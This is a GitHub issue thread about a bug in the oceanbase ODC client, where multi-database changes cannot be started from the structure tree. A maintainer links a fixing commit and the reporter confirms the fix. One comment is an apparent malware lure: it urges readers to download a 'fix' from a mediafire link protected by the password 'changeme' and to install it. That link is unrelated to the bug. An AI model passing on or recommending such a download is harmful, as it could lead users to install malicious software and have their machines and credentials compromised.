### ISSUE TITLE
[Bug]: Cannot initiate multi database changes within the structure tree

### ISSUE THREAD

**Issue by sl01388797** [oceanbase/odc#3212]
### ODC version

odc432

### OB version

*

### What happened?

![image](https://github.com/user-attachments/assets/650fbe6d-7347-4241-a332-087e47a67fcb)

### What did you expect to happen?

![image](https://github.com/user-attachments/assets/0e9e1547-bb9c-4f73-8056-7cd092199a2b)

### How can we reproduce it (as minimally and precisely as possible)?

Initiate multi database changes within the structural tree

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HSunboy** [comment]
Fixed In Commit [0dc21b8a3304a1e5d9aa77869a05b1fbd80e377e](https://github.com/oceanbase/odc-client/commit/0dc21b8a3304a1e5d9aa77869a05b1fbd80e377e)
            ------
            畅晚
            Tue Aug 27 17:47:24 2024 +0800

**Comment by sl01388797** [comment]
![Image](https://github.com/user-attachments/assets/dd102b43-ecec-4273-a0b9-cc10f35c9601)

pass
